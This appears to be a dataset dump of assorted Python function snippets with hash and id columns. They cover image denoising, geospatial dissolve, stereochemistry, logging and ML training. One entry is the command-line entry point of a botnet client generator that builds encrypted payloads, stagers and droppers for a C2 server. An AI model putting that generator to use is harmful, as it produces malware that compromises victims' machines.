content
stringlengths 35
762k
| sha1
stringlengths 40
40
| id
int64 0
3.66M
|
---|---|---|
def generate_extra(candidate: tuple, expansion_set, murder_list=None, attempted=None) -> list:
"""
Special routine for graph based algorithm
:param candidate:
:param expansion_set:
:param murder_list:
:param attempted:
:return:
"""
check = manufacture_lambda(attempted, murder_list)
accepted_sets = list()
for regular_constraint in expansion_set:
val = list(candidate)
val.append(regular_constraint)
future_child = tuple(sorted(val))
if check(future_child):
accepted_sets.append(future_child)
return accepted_sets
|
e38d605df2a562b269189c8e7714ec97e89d8f36
| 20,100 |
from typing import Tuple
from typing import Dict
def extract_oe_stereochemistry(
molecule: Molecule, oe_mol: "OEMol"
) -> Tuple[Dict[int, AtomStereochemistry], Dict[int, BondStereochemistry]]:
"""Extracts the CIP stereochemistry of each atom and bond in a OE molecule."""
atom_stereo = {
oe_atom.GetIdx(): atom_cip_stereochemistry(oe_mol, oe_atom)
for oe_atom in oe_mol.GetAtoms()
}
bond_stereo_tuples = {
tuple(
sorted([oe_bond.GetBgnIdx(), oe_bond.GetEndIdx()])
): bond_cip_stereochemistry(oe_mol, oe_bond)
for oe_bond in oe_mol.GetBonds()
}
bond_stereo = {
i: bond_stereo_tuples[tuple(sorted([bond.atom1_index, bond.atom2_index]))]
for i, bond in enumerate(molecule.bonds)
}
return atom_stereo, bond_stereo
|
0d051e847c94a81585a1478fc10bfac335d700a6
| 20,101 |
from dipy.denoise.nlmeans import nlmeans
from scipy.ndimage.morphology import binary_erosion
from scipy import ndimage
def nlmeans_proxy(in_file, settings,
snr=None,
smask=None,
nmask=None,
out_file=None):
"""
Uses non-local means to denoise 4D datasets
"""
if out_file is None:
fname, fext = op.splitext(op.basename(in_file))
if fext == '.gz':
fname, fext2 = op.splitext(fname)
fext = fext2 + fext
out_file = op.abspath('./%s_denoise%s' % (fname, fext))
img = nb.load(in_file)
hdr = img.header
data = img.get_data()
aff = img.affine
if data.ndim < 4:
data = data[..., np.newaxis]
data = np.nan_to_num(data)
if data.max() < 1.0e-4:
raise RuntimeError('There is no signal in the image')
df = 1.0
if data.max() < 1000.0:
df = 1000. / data.max()
data *= df
b0 = data[..., 0]
if smask is None:
smask = np.zeros_like(b0)
smask[b0 > np.percentile(b0, 85.)] = 1
smask = binary_erosion(
smask.astype(np.uint8), iterations=2).astype(np.uint8)
if nmask is None:
nmask = np.ones_like(b0, dtype=np.uint8)
bmask = settings['mask']
if bmask is None:
bmask = np.zeros_like(b0)
bmask[b0 > np.percentile(b0[b0 > 0], 10)] = 1
label_im, nb_labels = ndimage.label(bmask)
sizes = ndimage.sum(bmask, label_im, range(nb_labels + 1))
maxidx = np.argmax(sizes)
bmask = np.zeros_like(b0, dtype=np.uint8)
bmask[label_im == maxidx] = 1
nmask[bmask > 0] = 0
else:
nmask = np.squeeze(nmask)
nmask[nmask > 0.0] = 1
nmask[nmask < 1] = 0
nmask = nmask.astype(bool)
nmask = binary_erosion(nmask, iterations=1).astype(np.uint8)
den = np.zeros_like(data)
est_snr = True
if snr is not None:
snr = [snr] * data.shape[-1]
est_snr = False
else:
snr = []
for i in range(data.shape[-1]):
d = data[..., i]
if est_snr:
s = np.mean(d[smask > 0])
n = np.std(d[nmask > 0])
snr.append(s / n)
den[..., i] = nlmeans(d, snr[i], **settings)
den = np.squeeze(den)
den /= df
nb.Nifti1Image(den.astype(hdr.get_data_dtype()), aff,
hdr).to_filename(out_file)
return out_file, snr
|
69629ef536830ccecdee09e5acfadf02d892cc9d
| 20,102 |
from typing import Union
import os
from typing import Any
from typing import Optional
from typing import List
from pathlib import Path
def dissolve(
input_path: Union[str, 'os.PathLike[Any]'],
output_path: Union[str, 'os.PathLike[Any]'],
explodecollections: bool,
groupby_columns: Optional[List[str]] = None,
columns: Optional[List[str]] = [],
aggfunc: str = 'first',
tiles_path: Union[str, 'os.PathLike[Any]'] = None,
nb_squarish_tiles: int = 1,
clip_on_tiles: bool = True,
input_layer: str = None,
output_layer: str = None,
nb_parallel: int = -1,
verbose: bool = False,
force: bool = False):
"""
Applies a dissolve operation on the geometry column of the input file. Only
supports (Multi)Polygon files.
If the output is tiled (by specifying a tiles_path or nb_squarish_tiles > 1),
the result will be clipped on the output tiles and the tile borders are
never crossed.
Remarks:
* only aggfunc = 'first' is supported at the moment.
Args:
input_path (PathLike): the input file
output_path (PathLike): the file to write the result to
explodecollections (bool): True to output only simple geometries. If
False is specified, this can result in huge geometries for large
files, so beware...
groupby_columns (List[str], optional): columns to group on while
aggregating. Defaults to None, resulting in a spatial union of all
geometries that touch.
columns (List[str], optional): columns to retain in the output file.
The columns in parameter groupby_columns are always retained. The
other columns specified are aggregated as specified in parameter
aggfunc. If None is specified, all columns are retained.
Defaults to [] (= only the groupby_columns are retained).
aggfunc (str, optional): aggregation function to apply to columns not
grouped on. Defaults to 'first'.
tiles_path (PathLike, optional): a path to a geofile containing tiles.
If specified, the output will be dissolved/unioned only within the
tiles provided.
Can be used to evade huge geometries being created if the input
geometries are very interconnected.
Defaults to None (= the output is not tiled).
nb_squarish_tiles (int, optional): the approximate number of tiles the
output should be dissolved/unioned to. If > 1, a tiling grid is
automatically created based on the total bounds of the input file.
The input geometries will be dissolved/unioned only within the
tiles generated.
Can be used to evade huge geometries being created if the input
geometries are very interconnected.
Defaults to 1 (= the output is not tiled).
clip_on_tiles (bool, optional): deprecated: should always be True!
If the output is tiled (by specifying a tiles_path
or a nb_squarish_tiles > 1), the result will be clipped
on the output tiles and the tile borders are never crossed.
When False, a (scalable, fast) implementation always resulted in
some geometries not being merged or in duplicates.
Defaults to True.
input_layer (str, optional): input layer name. Optional if the
file only contains one layer.
output_layer (str, optional): input layer name. Optional if the
file only contains one layer.
nb_parallel (int, optional): the number of parallel processes to use.
If not specified, all available processors will be used.
verbose (bool, optional): write more info to the output.
Defaults to False.
force (bool, optional): overwrite existing output file(s).
Defaults to False.
"""
# Init
if clip_on_tiles is False:
logger.warn("The clip_on_tiles parameter is deprecated! It is ignored and always treated as True. When False, a fast implementation results in some geometries not being merged or in duplicates.")
if tiles_path is not None or nb_squarish_tiles > 1:
raise Exception("clip_on_tiles is deprecated, and the behaviour of clip_on_tiles is False is not supported anymore.")
tiles_path_p = None
if tiles_path is not None:
tiles_path_p = Path(tiles_path)
# If an empty list of geometry columns is passed, convert it to None to
# simplify the rest of the code
if groupby_columns is not None and len(groupby_columns) == 0:
groupby_columns = None
logger.info(f"Start dissolve on {input_path} to {output_path}")
return geofileops_gpd.dissolve(
input_path=Path(input_path),
output_path=Path(output_path),
explodecollections=explodecollections,
groupby_columns=groupby_columns,
columns=columns,
aggfunc=aggfunc,
tiles_path=tiles_path_p,
nb_squarish_tiles=nb_squarish_tiles,
input_layer=input_layer,
output_layer=output_layer,
nb_parallel=nb_parallel,
verbose=verbose,
force=force)
|
3f3d89bf99f025ea23c338d0c36f9e7cc9e9c6ae
| 20,103 |
def jointImgTo3D(sample):
"""
Normalize sample to metric 3D
:param sample: joints in (x,y,z) with x,y in image coordinates and z in mm
:return: normalized joints in mm
"""
ret = np.zeros((3,), np.float32)
# convert to metric using f
ret[0] = (sample[0]-centerX)*sample[2]/focalLengthX
ret[1] = (sample[1]-centerY)*sample[2]/focalLengthY
ret[2] = sample[2]
return ret
|
43726ed712e268c9fd2434fa2734ff8aa0ee2d0a
| 20,104 |
from typing import Set
from typing import Callable
from typing import List
import logging
def _find_registered_loggers(
source_logger: Logger, loggers: Set[str], filter_func: Callable[[Set[str]], List[logging.Logger]]
) -> List[logging.Logger]:
"""Filter root loggers based on provided parameters."""
root_loggers = filter_func(loggers)
source_logger.debug(f"Filtered root loggers: {root_loggers}")
return root_loggers
|
a15464298030821cea0beb61eaf1c679732e4155
| 20,105 |
def build_param_obj(key, val, delim=''):
"""Creates a Parameter object from key and value, surrounding key with delim
Parameters
----------
key : str
* key to use for parameter
value : str
* value to use for parameter
delim : str
* str to surround key with when adding to parameter object
Returns
-------
param_obj : :class:`taniumpy.object_types.parameter.Parameter`
* Parameter object built from key and val
"""
# create a parameter object
param_obj = taniumpy.Parameter()
param_obj.key = '{0}{1}{0}'.format(delim, key)
param_obj.value = val
return param_obj
|
0fba11c4564ef57eab45ffd02bed887c42a14121
| 20,106 |
def copy_fixtures_to_matrixstore(cls):
"""
Decorator for TestCase classes which copies data from Postgres into an
in-memory MatrixStore instance. This allows us to re-use database fixtures,
and the tests designed to work with those fixtures, to test
MatrixStore-powered code.
"""
# These methods have been decorated with `@classmethod` so we need to use
# `__func__` to get a reference to the original, undecorated method
decorated_setUpClass = cls.setUpClass.__func__
decorated_tearDownClass = cls.tearDownClass.__func__
def setUpClass(inner_cls):
decorated_setUpClass(inner_cls)
matrixstore = matrixstore_from_postgres()
stop_patching = patch_global_matrixstore(matrixstore)
# Have to wrap this in a staticmethod decorator otherwise Python thinks
# we're trying to create a new class method
inner_cls._stop_patching = staticmethod(stop_patching)
new_settings = override_settings(
CACHES={
"default": {"BACKEND": "django.core.cache.backends.dummy.DummyCache"}
}
)
new_settings.enable()
inner_cls._new_settings = new_settings
def tearDownClass(inner_cls):
inner_cls._stop_patching()
inner_cls._new_settings.disable()
decorated_tearDownClass(inner_cls)
cls.setUpClass = classmethod(setUpClass)
cls.tearDownClass = classmethod(tearDownClass)
return cls
|
b64ef9b23afc76b8f1b2cf1ae6b56635cd6e4f56
| 20,107 |
def intersect_description(first, second):
"""
Intersect two description objects.
:param first: First object to intersect with.
:param second: Other object to intersect with.
:return: New object.
"""
# Check that none of the object is None before processing
if first is None:
return second
if second is None:
return first
if first.description_type == second.description_type:
# Same MIME types, can merge content
value = let_user_choose(first.value, second.value)
description_type = first.description_type
else:
# MIME types are different, set MIME type to text
description_type = 'text/enriched'
value = """
Original MIME-type for first description: '{0}'.
{1}
----
Original MIME-type for second description: '{2}'.
{3}
""".format(first.description_type, first.value,
second.description_type, second.value)
return Description(value, description_type)
|
93d35314f8ab6ef0978de942ecfad3719c8f4971
| 20,108 |
def smooth_correlation_matrix(cor, sigma, exclude_diagonal=True):
"""Apply a simple gaussian filter on a correlation matrix.
Parameters
----------
cor : numpy array
Correlation matrix.
sigma : int, optional
Scale of the gaussian filter.
exclude_diagonal : boolean, optional
Whether to exclude the diagonal from the smoothing. That is what should
be done generally because the diagonal is 1 by definition.
Returns
-------
cor_new : numpy array
Smoothed correlation matrix.
"""
n_dim = len(np.diag(cor))
cor_new = np.copy(cor)
if exclude_diagonal:
cor_new[0, 0] = 0.5 * (cor[0, 1] + cor[1, 0])
cor_new[n_dim - 1, n_dim - 1] = 0.5 * (cor[n_dim - 1, n_dim - 2] +
cor[n_dim - 2, n_dim - 1])
for i in range(1, n_dim - 1):
cor_new[i, i] = 0.25 * (cor[i, i - 1] + cor[i, i + 1] +
cor[i - 1, i] + cor[i + 1, i])
cor_new = gaussian_filter(cor_new, sigma, mode='nearest')
if exclude_diagonal:
for i in range(n_dim):
cor_new[i, i] = cor[i, i]
return cor_new
|
753337cc12578b5c2333392f01e028204ac2f0e0
| 20,109 |
def quantize_iir_filter(filter_dict, n_bits):
"""
Quantize the iir filter tuple for sos_filt funcitons
Parameters:
- filter_dict: dict, contains the quantized filter dictionary with the following keys:
- coeff: np.array(size=(M, 6)), float representation of the coefficients
- coeff_scale: np.array(size=(M, 2)), scale all coefficients, not used here
- coeff_shift: np.array(size=(M, 2), dtype=int), amount to shift during computation
- y_scale: float, scale factor of the output, unused here
- y_shift: int, number of bits to shift the output for scaling
- n_bits: int, number of bits to represent the filter coefficients
Returns: tuple:
- a: np.array(size=(M+1, 3), dtype=int), quantized nominators
- a_shift: np.array(size=(M+1), dtype=int), amount to shift during computation
- b: np.array(size=(M+1, 3), dtype=int), quantized denumerators
- b_shift: np.array(size=(M+1), dtype=int), amount to shift during computation
- y_shift: int, amount to shift the output
"""
quant_coeff = filter_dict["coeff"]
scale_coeff = filter_dict["coeff_scale"]
comp_shift = filter_dict["coeff_shift"]
output_shift = filter_dict["y_shift"]
M = quant_coeff.shape[0]
assert quant_coeff.shape == (M, 6)
assert scale_coeff.shape == (M, 2)
assert comp_shift.shape == (M, 2)
assert comp_shift.dtype == int
assert np.all(comp_shift <= 0)
# generate the coefficients
a = np.ones((M + 1, 3), dtype=int) << (n_bits - 1)
b = np.ones((M + 1, 3), dtype=int) << (n_bits - 1)
a_shift = np.ones((M + 1, ), dtype=int) * (n_bits - 1)
b_shift = np.ones((M + 1, ), dtype=int) * (n_bits - 1)
for m in range(M):
a[m + 1, :] = quantize_to_int(quant_coeff[m, 3:], scale_coeff[m, 1], n_bits)
b[m + 1, :] = quantize_to_int(quant_coeff[m, :3], scale_coeff[m, 0], n_bits)
a_shift[m + 1] = -comp_shift[m, 1]
b_shift[m + 1] = -comp_shift[m, 0]
return a, a_shift, b, b_shift, output_shift
|
a8e93302072733d77acb563cd758725f14c05420
| 20,110 |
import json
import traceback
def add_goods(request, openid, store_id, store_name, dsr,
specification, brand, favorable_rate, pic_path, live_recording_screen_path, daily_price, commission_rate,
pos_price, preferential_way, goods_url, hand_card,
storage_condition, shelf_life, unsuitable_people, ability_to_deliver, shipping_cycle, shipping_addresses,
delivery_company, not_shipping):
"""
:request method: POST
商铺信息
:param store_id: 店铺id(最长45位)
:param store_name: 店铺id(最长45位)
:param dsr: 店铺评分
商品信息
:param goods_name: 商品名称
:param specification: 规格
:param brand: 商品品牌
:param favorable_rate: 好评率
:param pic_path: 商品主图链接(列表)
:param live_recording_screen_path: 知名主播带货视频链接
:param daily_price: 日常价格
:param live_price: 直播价格
:param commission_rate: 直播佣金比例
:param pos_price: 坑位费预算
:param preferential_way: 直播活动机制
:param goods_url: 商品链接
:param hand_card: 直播手卡
全网比价
:param tmall_price: 天猫价格
:param taobao_price: 淘宝价格
:param jd_price: 京东
:param pdd_price: 拼多多
:param offline_price: 线下商超
存储与运输
:param storage_condition: 存储条件
:param shelf_life: 保质期
:param unsuitable_people: 不适用人群
:param ability_to_deliver: 发货能力
:param shipping_cycle: 发货周期
:param shipping_addresses: 发货地址
:param delivery_company: 物流快递公司
:param not_shipping: 不发货区域
:param free_shipping: 包邮地区
其他
:param comment: 备注信息
:return:
{'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'}
{'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'}
{'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'}
"""
rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": '添加商品失败'}
try:
_, data = get_store_data_by_store_id(openid, store_id)
if not data:
is_success = insert_store_info(store_id, store_name, dsr, openid, ignore=True)
if not is_success:
raise InvalidParameter('店铺不存在,且新建失败')
is_success, pk = insert_goods_data(openid, json.loads(request.body))
if is_success:
rsp = {'code': ResponsCode.SUCCESS, 'data': {"goods_id": pk}, "msg": '添加商品成功'}
except InvalidParameter as e:
rsp = {'code': ResponsCode.FAILED, 'data': '', "msg": str(e)}
except:
logger.exception(traceback.format_exc())
rsp = {'code': ResponsCode.EXCEPTION, 'data': '', "msg": '添加商品异常'}
finally:
return rsp
|
e7a04a316e3fba3a803f20eb459dc8691ccc2642
| 20,111 |
import argparse
def cli_to_args():
"""
converts the command line interface to a series of args
"""
cli = argparse.ArgumentParser(description="")
cli.add_argument('-input_dir',
type=str, required=True,
help='The input directory that contains pngs and svgs of cowboys with Unicode names')
cli.add_argument('-output_dir',
type=str, required=True,
help='The output diectory where we will put pngs and svgs of cowboys with plain english names. Yee haw.')
return cli.parse_args()
|
db9502472d1cab92b7564abde2969daa06dbc4aa
| 20,112 |
import random
import argparse
import base64
import os
def main():
"""
Run the generator
"""
util.display(globals()['__banner'], color=random.choice(list(filter(lambda x: bool(str.isupper(x) and 'BLACK' not in x), dir(colorama.Fore)))), style='normal')
parser = argparse.ArgumentParser(
prog='client.py',
description="Generator (Build Your Own Botnet)"
)
parser.add_argument('host',
action='store',
type=str,
help='server IP address')
parser.add_argument('port',
action='store',
type=str,
help='server port number')
parser.add_argument('modules',
metavar='module',
action='append',
nargs='*',
help='module(s) to remotely import at run-time')
parser.add_argument('--name',
action='store',
help='output file name')
parser.add_argument('--icon',
action='store',
help='icon image file name')
parser.add_argument('--pastebin',
action='store',
metavar='API',
help='upload the payload to Pastebin (instead of the C2 server hosting it)')
parser.add_argument('--encrypt',
action='store_true',
help='encrypt the payload with a random 128-bit key embedded in the payload\'s stager',
default=False)
parser.add_argument('--compress',
action='store_true',
help='zip-compress into a self-extracting python script',
default=False)
parser.add_argument('--freeze',
action='store_true',
help='compile client into a standalone executable for the current host platform',
default=False)
parser.add_argument('--debug',
action='store_true',
help='enable debugging output for frozen executables',
default=False
)
parser.add_argument(
'-v', '--version',
action='version',
version='0.5',
)
options = parser.parse_args()
key = base64.b64encode(os.urandom(16))
var = generators.variable(3)
modules = _modules(options, var=var, key=key)
imports = _imports(options, var=var, key=key, modules=modules)
hidden = _hidden (options, var=var, key=key, modules=modules, imports=imports)
payload = _payload(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden)
stager = _stager (options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=payload)
dropper = _dropper(options, var=var, key=key, modules=modules, imports=imports, hidden=hidden, url=stager)
return dropper
|
f5c30d902f6123ce66579c7ba9c5dbe4f5ed580b
| 20,113 |
import string
def _get_metadata_from_configuration(
path, name, config,
fields, **kwargs
):
"""Recursively get metadata from configuration.
Args:
path: used to indicate the path to the root element.
mainly for trouble shooting.
name: the key of the metadata section.
config: the value of the metadata section.
fields: all fields defined in os fields or package fields dir.
"""
if not isinstance(config, dict):
raise exception.InvalidParameter(
'%s config %s is not dict' % (path, config)
)
metadata_self = config.get('_self', {})
if 'field' in metadata_self:
field_name = metadata_self['field']
field = fields[field_name]
else:
field = {}
# mapping to may contain $ like $partition. Here we replace the
# $partition to the key of the correspendent config. The backend then
# can use this kind of feature to support multi partitions when we
# only declare the partition metadata in one place.
mapping_to_template = metadata_self.get('mapping_to', None)
if mapping_to_template:
mapping_to = string.Template(
mapping_to_template
).safe_substitute(
**kwargs
)
else:
mapping_to = None
self_metadata = {
'name': name,
'display_name': metadata_self.get('display_name', name),
'field_type': field.get('field_type', dict),
'display_type': field.get('display_type', None),
'description': metadata_self.get(
'description', field.get('description', None)
),
'is_required': metadata_self.get('is_required', False),
'required_in_whole_config': metadata_self.get(
'required_in_whole_config', False),
'mapping_to': mapping_to,
'validator': metadata_self.get(
'validator', field.get('validator', None)
),
'js_validator': metadata_self.get(
'js_validator', field.get('js_validator', None)
),
'default_value': metadata_self.get('default_value', None),
'default_callback': metadata_self.get('default_callback', None),
'default_callback_params': metadata_self.get(
'default_callback_params', {}),
'options': metadata_self.get('options', None),
'options_callback': metadata_self.get('options_callback', None),
'options_callback_params': metadata_self.get(
'options_callback_params', {}),
'autofill_callback': metadata_self.get(
'autofill_callback', None),
'autofill_callback_params': metadata_self.get(
'autofill_callback_params', {}),
'required_in_options': metadata_self.get(
'required_in_options', False)
}
self_metadata.update(kwargs)
metadata = {'_self': self_metadata}
# Key extension used to do two things:
# one is to return the extended metadata that $<something>
# will be replace to possible extensions.
# The other is to record the $<something> to extended value
# and used in future mapping_to subsititution.
# TODO(grace): select proper name instead of key_extensions if
# you think it is better.
# Suppose key_extension is {'$partition': ['/var', '/']} for $partition
# the metadata for $partition will be mapped to {
# '/var': ..., '/': ...} and kwargs={'partition': '/var'} and
# kwargs={'partition': '/'} will be parsed to recursive metadata parsing
# for sub metadata under '/var' and '/'. Then in the metadata parsing
# for the sub metadata, this kwargs will be used to substitute mapping_to.
key_extensions = metadata_self.get('key_extensions', {})
general_keys = []
for key, value in config.items():
if key.startswith('_'):
continue
if key in key_extensions:
if not key.startswith('$'):
raise exception.InvalidParameter(
'%s subkey %s should start with $' % (
path, key
)
)
extended_keys = key_extensions[key]
for extended_key in extended_keys:
if extended_key.startswith('$'):
raise exception.InvalidParameter(
'%s extended key %s should not start with $' % (
path, extended_key
)
)
sub_kwargs = dict(kwargs)
sub_kwargs[key[1:]] = extended_key
metadata[extended_key] = _get_metadata_from_configuration(
'%s/%s' % (path, extended_key), extended_key, value,
fields, **sub_kwargs
)
else:
if key.startswith('$'):
general_keys.append(key)
metadata[key] = _get_metadata_from_configuration(
'%s/%s' % (path, key), key, value,
fields, **kwargs
)
if len(general_keys) > 1:
raise exception.InvalidParameter(
'foud multi general keys in %s: %s' % (
path, general_keys
)
)
return metadata
|
57dcbf0de49499391d8336d09b5b47d6c0f0d2e8
| 20,114 |
def calcOneFeatureEa(dataSet: list, feature_idx: int):
"""
获取一个特征的E(A)值
:param dataSet: 数据集
:param feature_idx: 指定的一个特征(这里是用下标0,1,2..表示)
:return:
"""
attrs = getOneFeatureAttrs(dataSet, feature_idx)
# 获取数据集的p, n值
p, n = getDatasetPN(dataSet)
ea = 0.0
for attr in attrs:
# 获取每个属性值对应的p, n值
attrP, attrN = getOneFeatureAttrPN(dataSet, feature_idx, attr)
# 计算属性对应的ipn
attrIPN = calcIpn(attrP, attrN)
ea += (attrP+attrN)/(p+n) * attrIPN
return ea
|
fc800b285bc24246ad9c40070d33ff429e395183
| 20,115 |
def translate_mapping(mapping: list, reference: SimpleNamespace, templ: bool=True, nontempl: bool=True,
correctframe: bool=True, filterframe: bool=True, filternonsense: bool=True):
"""
creates a protein mapping from a dna mapping.
:param mapping: a list/tuple of ops.
:param reference: the reference object to which the mapping is relative.
:param templ: include templated ops
:param nontempl: include nontemplated ops
:param correctframe: removes isolated ops that disrupt the frame
:param filterframe: don't return a mapping if there are remaining frameshifts.
:param filternonsense: don't return a mapping if contains a stop codon
:return:
"""
# create a mapping with the appropriate SNPs
base_mapping = []
if templ:
base_mapping.extend(templated(mapping, reference))
if nontempl:
base_mapping.extend(nontemplated(mapping, reference))
base_mapping.sort(key=lambda x: x[0])
# correct errors
if correctframe:
base_mapping = error_scrub(base_mapping)
# filter for whether it is in frame or not.
if filterframe and not len(transform(reference.seq, base_mapping)) % 3 == len(reference.seq) % 3:
return []
protein = translate(transform(reference.seq, base_mapping), offset=reference.offset)
if filternonsense and "_" in protein:
return []
protein_alns = align_proteins(reference.protein, protein)
return protein_alns
|
3a05ae38d9bccb8b855c91af850a92426c5031f3
| 20,116 |
from copy import copy
from numpy import zeros, unique
from itertools import product
def trainModel(label,bestModel,obs,trainSet,testSet,modelgrid,cv,optMetric='auc'):
""" Train a message classification model """
pred = zeros(len(obs))
fullpred = zeros((len(obs),len(unique(obs))))
model = copy(bestModel.model)
#find the best model via tuning grid
for tune in [dict(zip(modelgrid, v)) for v in product(*modelgrid.values())]:
for k in tune.keys():
setattr(model,k,tune[k])
i = 0
for tr, vl in cv:
model.fit(trainSet.ix[tr].values,obs[tr])
pred[vl] = model.predict_proba(trainSet.ix[vl].values)[:,1]
fullpred[vl,:] = model.predict_proba(trainSet.ix[vl].values)
i += 1
bestModel.updateModel(pred,fullpred,obs,model,trainSet.columns.values,tune,optMetric=optMetric)
#re-train with all training data
bestModel.model.fit(trainSet.values,obs)
print bestModel
return {label: {'pred': pred, 'test_pred':bestModel.model.predict_proba(testSet)[:,1]}}
|
8cea9f0044246972e80684fac584693a500198cc
| 20,117 |
def get_device_state():
"""Return the device status."""
state_cmd = get_adb_command_line('get-state')
return execute_command(
state_cmd, timeout=RECOVERY_CMD_TIMEOUT, log_error=True)
|
e517e7df3f5a7a1bf3925a46ce6a780dbc862910
| 20,118 |
def character_state(combat, character):
"""
Get the combat status of a single character, as a tuple of
current_hp, max_hp, total healing
"""
max_hp = Max_hp(character.base_hp)
total_h = 0
for effect in StatusEffect.objects.filter(character=character, combat=combat, effect_typ__typ='MAX_HP'):
max_hp.hp += effect.effect_val
current_hp = Current_hp(max_hp.hp)
for wound in Wound.objects.filter(character=character, combat=combat):
current_hp.hp -= wound.amount
for heal in Heal.objects.filter(character=character, combat=combat):
current_hp.hp += heal.amount
total_h += heal.amount
return current_hp, max_hp, total_h
|
d80315934ac653d34dd73cc1a9861b9c6e2f2c9c
| 20,119 |
def load_textfile(path) :
"""Returns text file as a str object
"""
f=open(path, 'r')
recs = f.read() # f.readlines()
f.close()
return recs
|
8e12a93bb4918cbae7d7e9aad6f09f562eca0c16
| 20,120 |
import scipy
def interp1d_to_uniform(x, y, axis=None):
"""Resample array to uniformly sampled axis.
Has some limitations due to use of scipy interp1d.
Args:
x (vector): independent variable
y (array): dependent variable, must broadcast with x
axis (int): axis along which to resample
Returns:
xu: uniformly spaced independent variable
yu: dependent resampled at xu
"""
x = np.asarray(x)
y = np.asarray(y)
if axis is None:
axis = mathx.vector_dim(x)
num = x.shape[axis]
mn = x.min(axis, keepdims=True)
mx = x.max(axis, keepdims=True)
# Limitation of scipy interp1d
x = x.squeeze()
mn = mn.squeeze()
mx = mx.squeeze()
assert x.ndim == 1
xu = np.arange(num)/(num - 1)*(mx - mn) + mn
yu = scipy.interpolate.interp1d(x.squeeze(), y, axis=axis, bounds_error=False)(xu)
return mathx.reshape_vec(xu, axis), yu
|
379071e0e0b718b4d4f8cc970a2b098cf3cab155
| 20,121 |
import os
def get_walkthrought_dir(dm_path):
""" return 3 parameter:
file_index[0]: total path infomation
file_index[1]: file path directory
file_index[2]: file name
"""
file_index = []
for dirPath, dirName, fileName in os.walk(dm_path):
for file in fileName:
path_info = [os.path.join(dirPath, file), dirPath, file]
file_index.append(path_info)
return file_index
|
74ecef62531001c27e05ab42b731739120656695
| 20,122 |
from typing import Dict
def flatten_dict(d: Dict):
"""Recursively flatten dictionaries, ordered by keys in ascending order"""
s = ""
for k in sorted(d.keys()):
if d[k] is not None:
if isinstance(d[k], dict):
s += f"{k}|{flatten_dict(d[k])}|"
else:
s += f"{k}|{d[k]}|"
return s
|
26663b52ccda2a695aa2367cbaf324698a47d56a
| 20,123 |
def getPVvecs(fname):
"""
Generates an ensemble of day long PV activities, sampled 3 different
days for each complete pv data set
"""
datmat = np.zeros((18,48))
df = dd.read_csv(fname)
i = 0
for unique_value in df.Substation.unique():
ttemp, ptemp = PVgettimesandpower("2014-06", unique_value, fname)
t, p = trimandshift(ttemp, ptemp)
datmat[i,:] = np.array(p)
i += 1
ttemp, ptemp = PVgettimesandpower("2014-07", unique_value, fname)
t, p = trimandshift(ttemp, ptemp)
datmat[i,:] = np.array(p)
i += 1
ttemp, ptemp = PVgettimesandpower("2014-08", unique_value, fname)
t, p = trimandshift(ttemp, ptemp)
datmat[i,:] = np.array(p)
i += 1
return datmat
|
322cf6d29d4104953678ec5e4dfbd5a82564ce1c
| 20,124 |
def vis9(n): # DONE
"""
O OO OOO
OO OOO OOOO
OOO OOOO OOOOO
Number of Os:
6 9 12"""
result = 'O' * (n - 1) + 'O\n'
result += 'O' * (n - 1) + 'OO\n'
result += 'O' * (n - 1) + 'OOO\n'
return result
|
c06c9fdf5d71ef89ce83d5fc2136b9854f018988
| 20,125 |
def derivative_circ_dist(x, p):
"""
Derivative of circumferential distance and derivative function, w.r.t. p
d/dp d(x, p) = d/dp min_{z in [-1, 0, 1]} (|z + p - x|)
Args:
x (float): first angle
p (float): second angle
Returns:
float: d/dp d(x, p)
"""
# pylint: disable=chained-comparison,misplaced-comparison-constant
t = p - x
if t < -0.5 or (0 < t and t < 0.5):
return -1
if t > 0.5 or (-0.5 < t and t < 0):
return 1
return 0
|
36a4cc04cda32e8c6e5896d405f96068def8be41
| 20,126 |
def get_MB_compatible_list(OpClass, lhs, rhs):
""" return a list of metablock instance implementing an operation of
type OpClass and compatible with format descriptor @p lhs and @p rhs
"""
fct_map = {
Addition: get_Addition_MB_compatible_list,
Multiplication: get_Multiplication_MB_compatible_list
}
return fct_map[OpClass](lhs, rhs)
|
172ca13f218f52e5834592fd09abf9444369d60c
| 20,127 |
import torch
import random
def create_mock_target(number_of_nodes, number_of_classes):
"""
Creating a mock target vector.
"""
return torch.LongTensor([random.randint(0, number_of_classes-1) for node in range(number_of_nodes)])
|
1be4d86a0291d24f0be555d4eea7d29f0994db29
| 20,128 |
def is_iterable(obj):
"""
Return true if object has iterator but is not a string
:param object obj: Any object
:return: True if object is iterable but not a string.
:rtype: bool
"""
return hasattr(obj, '__iter__') and not isinstance(obj, str)
|
c7a1353f7f62a567a65d0c4752976fefde6e1904
| 20,129 |
import logging
def convert_loglevstr_to_loglevint(loglevstr):
""" returns logging.NOTSET if we fail to match string """
if loglevstr.lower() == "critical":
return logging.CRITICAL
if loglevstr.lower() == "error":
return logging.ERROR
if loglevstr.lower() == "warning":
return logging.WARNING
if loglevstr.lower() == "info":
return logging.INFO
if loglevstr.lower() == "debug":
return logging.DEBUG
return logging.NOTSET
|
7d821ac54368012f60c220fd2f8d56267daa0006
| 20,130 |
def get_operator_module(operator_string):
"""
Get module name
"""
# the module, for when the operator is not a local operator
operator_path = ".".join(operator_string.split(".")[:-1])
assert len(operator_path) != 0, (
"Please specify a format like 'package.operator' to specify your operator. You passed in '%s'"
% operator_string
)
return operator_path
|
82b4ddc419b09b5874debbe64262b4a4f414cb8f
| 20,131 |
def is_fraction(obj):
"""Test whether the object is a valid fraction.
"""
return isinstance(obj, Fraction)
|
ab0a1b11274f837f479fb62648a144f0e689b499
| 20,132 |
def getExtrusion(matrix):
"""calculates DXF-Extrusion = Arbitrary Xaxis and Zaxis vectors
"""
AZaxis = matrix[2].copy().resize3D().normalize() # = ArbitraryZvector
Extrusion = [AZaxis[0],AZaxis[1],AZaxis[2]]
if AZaxis[2]==1.0:
Extrusion = None
AXaxis = matrix[0].copy().resize3D() # = ArbitraryXvector
else:
threshold = 1.0 / 64.0
if abs(AZaxis[0]) < threshold and abs(AZaxis[1]) < threshold:
# AXaxis is the intersection WorldPlane and ExtrusionPlane
AXaxis = M_CrossVecs(WORLDY,AZaxis)
else:
